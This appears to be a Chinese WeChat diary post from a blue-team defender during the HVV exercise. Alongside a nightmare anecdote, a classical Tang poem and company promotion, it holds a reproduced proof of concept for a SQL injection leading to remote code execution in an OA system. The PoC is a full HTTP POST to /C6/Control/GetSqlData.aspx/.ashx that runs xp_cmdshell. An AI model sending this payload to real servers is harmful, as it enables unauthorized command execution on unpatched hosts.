家人们谁懂啊，半夜的时候做噩梦。就我正要动手开始封IP的时候，屏幕上开始不断出现恐怖图片的弹窗，看着怪可怕的。下意识觉得这应该是红队干的，还给我发弹窗。。。

惊醒之后，手脚冰凉，感觉周围阴森森的。

估计是压力比较大，也比较累。新的一天从噩梦中醒来，这一早上的状态不好。

和往常一样，开场赋诗一首：

《春江花月夜》

唐·张若虚

春江潮水连海平，海上明月共潮生。

滟滟随波千万里，何处春江无月明！

江流宛转绕芳甸，月照花林皆似霰；

空里流霜不觉飞，汀上白沙看不见。

江天一色无纤尘，皎皎空中孤月轮。

江畔何人初见月？江月何年初照人？

人生代代无穷已，江月年年望相似。

不知江月待何人，但见长江送流水。

白云一片去悠悠，青枫浦上不胜愁。

谁家今夜扁舟子？何处相思明月楼？

可怜楼上月徘徊，应照离人妆镜台。

玉户帘中卷不去，捣衣砧上拂还来。

此时相望不相闻，愿逐月华流照君。

鸿雁长飞光不度，鱼龙潜跃水成文。

昨夜闲潭梦落花，可怜春半不还家。

江水流春去欲尽，江潭落月复西斜。

斜月沉沉藏海雾，碣石潇湘无限路。

不知乘月几人归，落月摇情满江树。

今天有空的时候就会做点检查工作，翻翻日志、网络流量之类的东西。误报之类的，来一下确实会紧张，因为看到告警的时候，还不能立刻知道是否为误报。团队还是以大带小的策略，实现无缝的防守策略。

一、红队攻击

1. 红队漏洞情况

某和-OA-SQL注入导致RCE（已复现）

漏洞路径：

/C6/Control/GetSqlData.aspx/.ashx

POC：

1.POST /C6/Control/GetSqlData.aspx/.ashx HTTP/1.1

2.Host:

3.User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36

4.Accept: */*

5.Content-Type: text/plain

6.Accept-Encoding: gzip, deflate

7.Accept-Language: zh-CN,zh;q=0.9

8.Cookie: ASP.NET_SessionId=0jou1dhd0qdrxutyufitpbre; myie=false

9.Connection: close

10.Content-Length: 35

11.exec master..xp_cmdshell 'ipconfig'

二、蓝队防守

1. 蓝队封禁IP列表

三、笑话

四、 公众号

团队成立于2016年，WIS-HUNTER（中文全称智慧网络病毒猎手），拥有最全的信息安全服务内容；具备强大的安全研究团队，公司下辖多个实验室，其中杀手锏攻防实验室拥有大批漏洞发掘和分析人员，是独立发掘CVE和CNVD漏洞数量的团队；拥有覆盖8*N人的专业安全服务团队。

团队理念：

【理念】

以小博大，技术是杀手锏。

【文化】

1.明白人：知其然，知其所以然！不要迷惑于表象而要洞察事务的本质，要有文盲学习知识的心态，有时我们的学历，是我们学习过程中 最大的障碍。

2.出品人：本人出品，必属上品！有自我荣誉意识、追求卓越意识。乔布斯：人这辈子没法做太多事情，所以每一件都要做到精彩绝伦。

原文始发于微信公众号（oldhand）：Day4-菜鸟的【HVV日记】